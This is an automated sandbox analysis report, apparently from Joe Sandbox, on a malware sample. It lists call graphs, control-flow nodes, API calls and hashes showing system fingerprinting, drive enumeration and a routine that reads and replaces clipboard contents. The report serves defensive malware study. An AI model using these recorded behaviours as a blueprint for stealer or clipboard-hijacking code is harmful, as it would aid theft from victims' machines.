LdrInitializeThunk 33225->33234 33231 43c001 33226->33231 33235 43bd20 33226->33235 33229 43be6a 33233 43bf0e 33229->33233 33238 43da10 LdrInitializeThunk 33229->33238 33239 43bd40 33233->33239 33234->33226 33243 43f2f0 33235->33243 33237 43bd2a RtlAllocateHeap 33237->33229 33238->33233 33240 43bd53 33239->33240 33241 43bd55 33239->33241 33240->33231 33242 43bd5a RtlFreeHeap 33241->33242 33242->33231 33244 43f300 33243->33244 33244->33237 33244->33244 33245 43fef0 33246 43ff10 33245->33246 33248 43ff4e 33246->33248 33255 43da10 LdrInitializeThunk 33246->33255 33247 44016d 33248->33247 33249 43bd20 RtlAllocateHeap 33248->33249 33252 43ffc5 33249->33252 33251 43bd40 RtlFreeHeap 33251->33247 33254 44003f 33252->33254 33256 43da10 LdrInitializeThunk 33252->33256 33254->33251 33255->33248 33256->33254 33447 4384b0 33448 4384d5 33447->33448 33451 438576 33448->33451 33456 43da10 LdrInitializeThunk 33448->33456 33450 438761 33451->33450 33453 43865e 33451->33453 33455 43da10 LdrInitializeThunk 33451->33455 33453->33450 33457 43da10 LdrInitializeThunk 33453->33457 33455->33451 33456->33448 33457->33453 33274 42bdf4 33275 42be04 FreeLibrary 33274->33275 33278 42be2b 33275->33278 33277 42beab GetComputerNameExA 33279 42bf2e 33277->33279 33278->33277 33278->33278 33279->33279 33458 40d4b9 33460 40d510 33458->33460 33461 43da10 LdrInitializeThunk 33460->33461 33461->33460 33462 436a38 33463 436a50 33462->33463 33464 436a65 GetUserDefaultUILanguage 33463->33464 33465 436a85 33464->33465 33280 42217d 33281 422222 33280->33281 33282 422194 33280->33282 33283 4227c1 33281->33283 33285 422e64 33281->33285 33291 43da10 LdrInitializeThunk 33281->33291 33282->33281 33289 43da10 LdrInitializeThunk 33282->33289 33290 43da10 LdrInitializeThunk 33285->33290 33288 422e86 33289->33281 33290->33288 33291->33281
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $$$$$%JU$&$'$($($*$*$-$.$3$4$4$5$7$8$8$9$:$;$<$>$?$@$@$B$C$D$D$D$D$D$E$F$G$I$L$L$M`QW$Z$[$\$_$`$`$`$a$a$c$e$e$e$f$f$f$g$g$g$g$h$h$i$j$k$l$m$o$o$q$r$w$y${$|$}$}
                                                                                  • API String ID: 0-362997037
                                                                                  • Opcode ID: 4d9be5020c6e82cf067b014f18fe9f73e9b73f1c5d366c73e9ef59bca02c0f63
                                                                                  • Instruction ID: 73db62761c6805435fe7a1f262c61e7275afd3a694a408c1188180c8cf5c63de
                                                                                  • Opcode Fuzzy Hash: 4d9be5020c6e82cf067b014f18fe9f73e9b73f1c5d366c73e9ef59bca02c0f63
                                                                                  • Instruction Fuzzy Hash: 0A13E17160C7C08AD3349B3889443EFBFD1ABD6324F188A2EE5E9873D2D67885858757

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 476 4387d0-4387f5 477 438800-43882f 476->477 477->477 478 438831-438844 477->478 479 438850-438890 478->479 479->479 480 438892-4388d7 479->480 481 4388e0-43890e 480->481 481->481 482 438910-43892f 481->482 484 4389d2-4389df 482->484 485 438935-43893e 482->485 487 4389e0-438a0b 484->487 486 438940-438970 485->486 486->486 488 438972-438988 486->488 487->487 489 438a0d-438a6a CoCreateInstance 487->489 490 438990-4389bc 488->490 491 438a70-438aa1 489->491 492 438fbb-438fe4 call 43f730 GetVolumeInformationW 489->492 490->490 494 4389be-4389cb 490->494 495 438ab0-438ace 491->495 498 438fe6-438fea 492->498 499 438fee-438ff0 492->499 494->484 495->495 497 438ad0-438afc SysAllocString 495->497 504 438b02-438b1c CoSetProxyBlanket 497->504 505 438fa8-438fb7 SysFreeString 497->505 498->499 500 43900d-439014 499->500 502 439020-439036 500->502 503 439016-43901d 500->503 506 439040-439054 502->506 503->502 507 438b22-438b3f 504->507 508 438f9e-438fa4 504->508 505->492 506->506 510 439056-43908f 506->510 509 438b40-438bae 507->509 508->505 509->509 511 438bb0-438c26 SysAllocString 509->511 512 439090-4390c9 510->512 513 438c30-438c44 511->513 512->512 514 4390cb-4390ff call 41d350 512->514 513->513 516 438c46-438c77 SysAllocString 513->516 518 439100-439108 514->518 521 438f89-438f9b SysFreeString * 2 516->521 522 438c7d-438c9f 516->522 518->518 520 43910a-43910c 518->520 523 439112-439122 call 407ff0 520->523 524 439000-439007 520->524 521->508 529 438ca5-438ca8 522->529 530 438f7f-438f85 522->530 523->524 524->500 527 439127-43912e 524->527 529->530 531 438cae-438cb3 529->531 530->521 531->530 532 438cb9-438d01 VariantInit 531->532 533 438d10-438d51 532->533 533->533 534 438d53-438d65 533->534 535 438d69-438d72 534->535 536 438d78-438d7e 535->536 537 438f6e-438f7b VariantClear 535->537 536->537 538 438d84-438d8e 536->538 537->530 539 438d90-438d97 538->539 540 438dcd-438dcf 538->540 541 438dac-438db0 539->541 542 438dd1-438deb call 407f70 540->542 543 438db2-438dbb 541->543 544 438da0 541->544 551 438df1-438dfd 542->551 552 438f19-438f2a 542->552 547 438dc2-438dc6 543->547 548 438dbd-438dc0 543->548 546 438da1-438daa 544->546 546->541 546->542 547->546 550 438dc8-438dcb 547->550 548->546 550->546 551->552 555 438e03-438e0b 551->555 553 438f31-438f44 552->553 554 438f2c 552->554 557 438f46 553->557 558 438f4b-438f6b call 407fa0 call 407f80 553->558 554->553 556 438e10-438e1a 555->556 559 438e30-438e36 556->559 560 438e1c-438e21 556->560 557->558 558->537 563 438e54-438e62 559->563 564 438e38-438e3b 559->564 562 438ec0-438ec6 560->562 570 438ec8-438ece 562->570 567 438e64-438e67 563->567 568 438eda-438ee2 563->568 564->563 566 438e3d-438e52 564->566 566->562 567->568 571 438e69-438ebf 567->571 574 438ee4-438ee6 568->574 575 438ee8-438eeb 568->575 570->552 573 438ed0-438ed2 570->573 571->562 573->556 576 438ed8 573->576 574->570 577 438f15-438f17 575->577 578 438eed-438f13 575->578 576->552 577->562 578->562
                                                                                  APIs
                                                                                  • CoCreateInstance.OLE32(0044368C,00000000,00000001,0044367C), ref: 00438A5F
                                                                                  • SysAllocString.OLEAUT32(AF71AD7E), ref: 00438AD5
                                                                                  • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438B14
                                                                                  • SysAllocString.OLEAUT32(5F8F5D8B), ref: 00438BB5
                                                                                  • SysAllocString.OLEAUT32(4F0B4D1F), ref: 00438C4B
                                                                                  • VariantInit.OLEAUT32(F2FDFCE7), ref: 00438CBE
                                                                                  • SysFreeString.OLEAUT32(?), ref: 00438FAC
                                                                                  • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00438FE0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: String$Alloc$BlanketCreateFreeInformationInitInstanceProxyVariantVolume
                                                                                  • String ID: UvW$$%&'$&e?g$'y){$Rac$xY`[$|}
                                                                                  • API String ID: 505850577-3935235898
                                                                                  • Opcode ID: cedc0d122eda84c37e771d2f76dcedd7a404c4fffcf9a77079a05c5f669563b7
                                                                                  • Instruction ID: 3c98ca3655e8fbad89b897cedc23f9ec929c21c5d575d6668501c9692a1c22de
                                                                                  • Opcode Fuzzy Hash: cedc0d122eda84c37e771d2f76dcedd7a404c4fffcf9a77079a05c5f669563b7
                                                                                  • Instruction Fuzzy Hash: 4D32F072A083408BD314CF64C8817ABFBE2EBD9714F18592EF5949B390DB78D905CB96

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 585 41052c-410544 586 410546-410549 585->586 587 410573-4105a1 call 401880 586->587 588 41054b-410571 586->588 591 4105a3-4105a6 587->591 588->586 592 4105d5-4105f8 call 401880 591->592 593 4105a8-4105d3 591->593 596 4105fa-410636 call 413e30 592->596 597 4105fc-410600 592->597 593->591 605 410638 596->605 606 41063a-41067d call 407f70 call 40a510 596->606 599 410fc3 597->599 601 411ba0 599->601 603 411ba2-411ba5 call 401f40 601->603 612 40eae1-411bb6 603->612 613 40eae8-40eb12 call 401f50 603->613 605->606 618 410684-410687 606->618 619 40eb16-40eb19 613->619 620 4106b4-4106cd call 401880 618->620 621 410689-4106b2 618->621 622 40eb55-40eb7b call 401e40 619->622 623 40eb1b-40eb53 619->623 628 4106d3-41073b call 413e30 620->628 629 410777-4107d0 call 413e30 620->629 621->618 631 40eb7d-40eba0 622->631 632 40eb7f 622->632 623->619 640 41073d 628->640 641 41073f-410770 call 407f70 call 40a510 628->641 637 4107d2 629->637 638 4107d4-410872 call 407f70 call 40a510 RtlExpandEnvironmentStrings 629->638 639 40eba2-40eba5 631->639 632->603 637->638 655 410876-410879 638->655 643 40eba7-40ebf6 639->643 644 40ebf8-40ec4d call 401980 639->644 640->641 641->629 643->639 644->601 652 40ec53 644->652 652->601 656 410898-4108a1 655->656 657 41087b-410896 655->657 658 4108a3-4108b6 call 407f80 656->658 659 4108bb-4108d4 656->659 657->655 658->599 661 4108d6 659->661 662 4108d8-410933 call 407f70 RtlExpandEnvironmentStrings 659->662 661->662 668 410935-410959 call 407f80 * 2 662->668 669 41095e-410987 call 407f80 662->669 685 410fc1 668->685 676 410989-41098c 669->676 678 4109ca-4109ea call 401880 676->678 679 41098e-4109c8 676->679 686 4109ec 678->686 687 4109ee-410a0f call 413e30 678->687 679->676 685->599 688 410a45-410a64 686->688 694 410a11 687->694 695 410a13-410a43 call 407f70 call 40a510 687->695 690 410a66-410a69 688->690 692 410ab2-410afd call 401b90 690->692 693 410a6b-410ab0 690->693 701 410b01-410b04 692->701 693->690 694->695 695->688 703 410b06-410b39 701->703 704 410b3b-410b63 call 401a90 701->704 703->701 707 410b69-410ba5 call 414290 call 401f40 704->707 708 410e8c-410f1c call 408890 call 414ea0 call 409400 704->708 718 410ba7 707->718 719 410ba9-410bce call 407f70 707->719 720 410f21-410f26 708->720 718->719 727 410bd0-410bd7 719->727 728 410bfb-410bfd 719->728 722 410f65-410f97 call 407f80 * 2 720->722 723 410f28-410f37 720->723 760 410fa1-410fab 722->760 761 410f99-410f9c call 407f80 722->761 725 410f59-410f61 call 407f80 723->725 726 410f39-410f40 723->726 725->722 731 410f42-410f55 call 4140e0 726->731 739 410bd9-410bf1 call 413f60 727->739 730 410bff-410c01 728->730 735 410c03-410c0a 730->735 736 410c0f-410c4a call 401f50 730->736 747 410f57 731->747 735->708 750 410c4c-410c4f 736->750 751 410bf3 739->751 752 410bf5-410bf9 739->752 747->725 754 410c51-410c81 750->754 755 410c83-410cc3 call 401880 750->755 751->739 752->728 754->750 762 410cc5-410cc8 755->762 764 410fb5-410fbc call 408970 760->764 765 410fad-410fb0 call 407f80 760->765 761->760 766 410ce7-410d2f call 401880 762->766 767 410cca-410ce5 762->767 764->685 765->764 772 410d31-410d34 766->772 767->762 773 410d82-410dd4 call 401b90 772->773 774 410d36-410d80 772->774 777 410dd6-410dd9 773->777 774->772 778 410e16-410e87 call 401b90 call 413f80 777->778 779 410ddb-410e14 777->779 778->730 779->777
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 1$<$A$G$U$[$b$f$p$x${
                                                                                  • API String ID: 0-2596809943
                                                                                  • Opcode ID: 06a85181474689744a2e3f55f7eab027660ec147f8b5799b2c8a475eacb6260e
                                                                                  • Instruction ID: 977eae197484217fe3de983ef0328e02866eaecbdb9648841de3f436da40142b
                                                                                  • Opcode Fuzzy Hash: 06a85181474689744a2e3f55f7eab027660ec147f8b5799b2c8a475eacb6260e
                                                                                  • Instruction Fuzzy Hash: 3052907160C7808BD324DB38C5953AFBBE1ABD5314F148A2EE4DAD73C1DA7889858B47

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(00000001), ref: 038A1032
                                                                                  • OpenClipboard.USER32(00000000), ref: 038A103C
                                                                                  • GetClipboardData.USER32(0000000D), ref: 038A104C
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 038A105D
                                                                                  • GlobalAlloc.KERNEL32(00000002,-00000004), ref: 038A1090
                                                                                  • GlobalLock.KERNEL32 ref: 038A10A0
                                                                                  • GlobalUnlock.KERNEL32 ref: 038A10C1
                                                                                  • EmptyClipboard.USER32 ref: 038A10CB
                                                                                  • SetClipboardData.USER32(0000000D), ref: 038A10D6
                                                                                  • GlobalFree.KERNEL32 ref: 038A10E3
                                                                                  • GlobalUnlock.KERNEL32(?), ref: 038A10ED
                                                                                  • CloseClipboard.USER32 ref: 038A10F3
                                                                                  • GetClipboardSequenceNumber.USER32 ref: 038A10F9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2570235413.00000000038A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 038A0000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2570220541.00000000038A0000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2570249914.00000000038A2000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_38a0000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
                                                                                  • String ID:
                                                                                  • API String ID: 1416286485-0
                                                                                  • Opcode ID: d84f7d812b42e5c573922966138a6371759f09f56b4166e7db2c21a49cc90113
                                                                                  • Instruction ID: f7d9234c761299d369688ba2132cfb0a66b42303c26197e4e459d0f22924ab76
                                                                                  • Opcode Fuzzy Hash: d84f7d812b42e5c573922966138a6371759f09f56b4166e7db2c21a49cc90113
                                                                                  • Instruction Fuzzy Hash: 59219835604E50ABF7307BFAAC0DB6AB7A8FF45745F0808F8F945D6164E7618810D7A1

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 811 4230d3-4230d6 812 4230e5-4230ee 811->812 813 4230dd 811->813 814 4230f0-4230f5 812->814 815 4230f7 812->815 813->812 816 4230fe-423139 call 407f70 814->816 815->816 819 423140-42316f 816->819 819->819 820 423171-423179 819->820 821 423191-42319d 820->821 822 42317b-42317e 820->822 824 4231c1-4231dd call 440dc0 821->824 825 42319f-4231a3 821->825 823 423180-42318f 822->823 823->821 823->823 829 4233a3 824->829 830 4234c0-423562 824->830 831 4231f4-4231fd 824->831 832 4231e4-4231eb 824->832 833 4233a9-42344b 824->833 826 4231b0-4231bf 825->826 826->824 826->826 829->833 837 423570-4235ad 830->837 834 423206 831->834 835 4231ff-423204 831->835 832->831 836 423450-42348c 833->836 838 42320d-4232b1 call 407f70 834->838 835->838 836->836 839 42348e-4234b1 call 420e10 836->839 837->837 840 4235af-4235c3 call 420e10 837->840 847 4232c0-4232ee 838->847 839->830 844 4235c8-4235cb 840->844 848 4235d3-4235eb 844->848 847->847 849 4232f0-4232f8 847->849 850 4235f0-423620 848->850 851 423321-423334 849->851 852 4232fa-423301 849->852 850->850 853 423622-4236aa 850->853 855 423351-423371 GetLogicalDrives call 440dc0 851->855 856 423336-42333a 851->856 854 423310-42331f 852->854 858 4236b0-4236d1 853->858 854->851 854->854 855->848 862 423720-423726 call 407f80 855->862 863 423711 855->863 864 423717-42371d call 407f80 855->864 865 423735-42373b call 407f80 855->865 866 42370b 855->866 867 423378-423392 855->867 868 423399 855->868 869 42373e-42374a 855->869 870 42372f 855->870 871 4236fc-423702 call 407f80 855->871 859 423340-42334f 856->859 858->858 861 4236d3-4236f2 call 420a30 858->861 859->855 859->859 861->871 862->870 863->864 864->862 865->869 866->863 867->848 867->862 867->863 867->864 867->865 867->866 867->868 867->869 867->870 867->871 868->829 870->865 871->866
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: DJ$,@ F$,D J$57B$>\:B$IF$HN
                                                                                  • API String ID: 0-546559132
                                                                                  • Opcode ID: 256cd1e2b87f342527cd7979723287081b232435937e080061f0061264ea3875
                                                                                  • Instruction ID: 573b38de4df0c584551da9470d46ba7f63cc1349f9138d30f378e2aa21cb097c
                                                                                  • Opcode Fuzzy Hash: 256cd1e2b87f342527cd7979723287081b232435937e080061f0061264ea3875
                                                                                  • Instruction Fuzzy Hash: 88E1D9B560D3418FD310CF68E89126BBBE1FBC5754F14892DE9818B361E778890ACB4B

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1023 409400-40940e 1024 409853 1023->1024 1025 409414-40947b call 405e20 call 407f70 1023->1025 1027 409855-409861 1024->1027 1031 409480-4094bc 1025->1031 1031->1031 1032 4094be-4094de call 408d30 1031->1032 1035 4094e0-40950d 1032->1035 1035->1035 1036 40950f-409536 call 408d30 1035->1036 1039 409540-409581 1036->1039 1039->1039 1040 409583-4095b3 call 408d30 1039->1040 1043 4095c0-4095d4 1040->1043 1043->1043 1044 4095d6-4095e3 1043->1044 1045 4095f0-40961c 1044->1045 1045->1045 1046 40961e-40963b call 408d30 1045->1046 1049 409640-409688 1046->1049 1049->1049 1050 40968a-409758 call 409000 1049->1050 1053 409760-409774 1050->1053 1053->1053 1054 409776-40977e 1053->1054 1055 409780-409788 1054->1055 1056 4097a1-4097ac 1054->1056 1057 409790-40979f 1055->1057 1058 4097d1-4097ff 1056->1058 1059 4097ae-4097b1 1056->1059 1057->1056 1057->1057 1061 409800-409814 1058->1061 1060 4097c0-4097cf 1059->1060 1060->1058 1060->1060 1061->1061 1062 409816-40982b call 40bf90 1061->1062 1064 409830-409851 call 407f80 1062->1064 1064->1027
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 9Z$F72FA77EBAEB2CCB8246926E533C64D7$QB$f*Dk$hi$j*Dk
                                                                                  • API String ID: 0-1644723278
                                                                                  • Opcode ID: b730e9b78eb2bf3f614c61d1bfed981cc9b54103566f3d92fdc9fb82601dc528
                                                                                  • Instruction ID: f303c378167b457a4bc42ceebe78ce79b7bb772c8b3d846b3dc4aa0fafa8ed13
                                                                                  • Opcode Fuzzy Hash: b730e9b78eb2bf3f614c61d1bfed981cc9b54103566f3d92fdc9fb82601dc528
                                                                                  • Instruction Fuzzy Hash: 85B1227161C3808BD718DF65C8516ABBBE2EBD2304F14892DE0E59B392D73CD50ACB5A

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1067 42c98c-42c9aa 1068 42c9b0-42c9ea 1067->1068 1068->1068 1069 42c9ec-42c9f9 1068->1069 1070 42ca1b-42ca27 1069->1070 1071 42c9fb-42ca01 1069->1071 1073 42ca41-42ca8b call 43f730 1070->1073 1074 42ca29-42ca2b 1070->1074 1072 42ca10-42ca19 1071->1072 1072->1070 1072->1072 1080 42ca90-42cad1 1073->1080 1076 42ca30-42ca3d 1074->1076 1076->1076 1078 42ca3f 1076->1078 1078->1073 1080->1080 1081 42cad3-42cb12 call 41d350 1080->1081 1084 42cb20-42cb4c 1081->1084 1084->1084 1085 42cb4e-42cb55 1084->1085 1086 42cb57-42cb5b 1085->1086 1087 42cb6b-42cb73 1085->1087 1088 42cb60-42cb69 1086->1088 1089 42cb75-42cb76 1087->1089 1090 42cb8b-42cb95 1087->1090 1088->1087 1088->1088 1093 42cb80-42cb89 1089->1093 1091 42cb97-42cb9b 1090->1091 1092 42cbab-42cbeb 1090->1092 1094 42cba0-42cba9 1091->1094 1095 42cbf0-42cc04 1092->1095 1093->1090 1093->1093 1094->1092 1094->1094 1095->1095 1096 42cc06-42cc0d 1095->1096 1097 42cc2b-42cc35 1096->1097 1098 42cc0f-42cc13 1096->1098 1100 42cc37-42cc3b 1097->1100 1101 42cc4b-42ccf2 1097->1101 1099 42cc20-42cc29 1098->1099 1099->1097 1099->1099 1102 42cc40-42cc49 1100->1102 1103 42cd00-42cd3a 1101->1103 1102->1101 1102->1102 1103->1103 1104 42cd3c-42cd49 1103->1104 1105 42cd5b-42cd67 1104->1105 1106 42cd4b-42cd4f 1104->1106 1107 42cd81-42cdd3 call 43f730 GetPhysicallyInstalledSystemMemory 1105->1107 1108 42cd69-42cd6b 1105->1108 1109 42cd50-42cd59 1106->1109 1114 42cde0-42ce22 1107->1114 1110 42cd70-42cd7d 1108->1110 1109->1105 1109->1109 1110->1110 1112 42cd7f 1110->1112 1112->1107 1114->1114 1115 42ce24-42ce5b call 41d350 1114->1115 1118 42ce60-42ce8c 1115->1118 1118->1118 1119 42ce8e-42ce95 1118->1119 1120 42ce97-42ce9b 1119->1120 1121 42ceab-42ceb3 1119->1121 1122 42cea0-42cea9 1120->1122 1123 42ceb5-42ceb6 1121->1123 1124 42cecb-42ced5 1121->1124 1122->1121 1122->1122 1125 42cec0-42cec9 1123->1125 1126 42ced7-42cedb 1124->1126 1127 42ceeb-42cf2b 1124->1127 1125->1124 1125->1125 1128 42cee0-42cee9 1126->1128 1129 42cf30-42cf44 1127->1129 1128->1127 1128->1128 1129->1129 1130 42cf46-42cf55 1129->1130 1131 42cf57 1130->1131 1132 42cf6b-42cf75 1130->1132 1133 42cf60-42cf69 1131->1133 1134 42cf77 1132->1134 1135 42cf8b-42d015 1132->1135 1133->1132 1133->1133 1136 42cf80-42cf89 1134->1136 1136->1135 1136->1136
                                                                                  APIs
                                                                                  • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042CDAC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: InstalledMemoryPhysicallySystem
                                                                                  • String ID: @[/S$YcZ`$b
                                                                                  • API String ID: 3960555810-168354034
                                                                                  • Opcode ID: 3b8701f6d285188c90c39da254eef539b97e416a32c7c175b415e0f0a5f096d4
                                                                                  • Instruction ID: b2947f96fe340a9df3130b14c84d258fde6853037fb12cce7bd63350d2db69b3
                                                                                  • Opcode Fuzzy Hash: 3b8701f6d285188c90c39da254eef539b97e416a32c7c175b415e0f0a5f096d4
                                                                                  • Instruction Fuzzy Hash: 39F1247060C3D18BD729CF29A4A036FFFE1AF96304F18496EE0DA87392D77985058B56
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6cc985996d123b44c06bdbe62607eeac046dd191f9733dc24fca1af59f0d703a
                                                                                  • Instruction ID: b8f4197d2f7c9f56fe9597a4586bb863907c9934a7ce81ce2e300af997d9591d
                                                                                  • Opcode Fuzzy Hash: 6cc985996d123b44c06bdbe62607eeac046dd191f9733dc24fca1af59f0d703a
                                                                                  • Instruction Fuzzy Hash: 398117B190C2018FC714DF28C8916ABB7F1AF95304F18492EE4D987392E738E945CB9B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: TUVW
                                                                                  • API String ID: 2994545307-380802359
                                                                                  • Opcode ID: 5a35a9d452afbc38b6c475497b936c0f9f51ddbb7844b1b6c0d36c5b06337292
                                                                                  • Instruction ID: 7047d3b5c699d964b661b5aab337125677ab7b56ce49f2f3292149c0b4397d23
                                                                                  • Opcode Fuzzy Hash: 5a35a9d452afbc38b6c475497b936c0f9f51ddbb7844b1b6c0d36c5b06337292
                                                                                  • Instruction Fuzzy Hash: 659165717083019FE325DF68D880A2BB7E2EBD6310F18893DE69597391C639DC16CB96
                                                                                  APIs
                                                                                  • LdrInitializeThunk.NTDLL(00440D9D,00000002,00000018,?,?,00000018,?,?,?), ref: 0043DA3E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                  • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                  • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                  • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                  Strings
                                                                                  • F72FA77EBAEB2CCB8246926E533C64D7, xrefs: 0040D240
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: F72FA77EBAEB2CCB8246926E533C64D7
                                                                                  • API String ID: 0-2982782357
                                                                                  • Opcode ID: 9e7cc8c59f2c18173cea31accb2a176d643aef917dc6008e0370f2a834755b9a
                                                                                  • Instruction ID: b8d103c4c60b49fbe0ba22ba74ead3f046f8f308e92d5c9b0b08579b41597fc8
                                                                                  • Opcode Fuzzy Hash: 9e7cc8c59f2c18173cea31accb2a176d643aef917dc6008e0370f2a834755b9a
                                                                                  • Instruction Fuzzy Hash: 8C51BC72B407004BDB184F79CC52377B6A3AFE6321F1D967DD0969B7D6E63898028308
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2569403096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2569403096.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: af5b5c8d97ad725f1cba710caa06336f5d4c090d00e4ccb21e8133b60b871a38
                                                                                  • Instruction ID: c62614d48869f4b7cb033b57bff67ce6e552f370dc62dc9228bf6d030800f41c
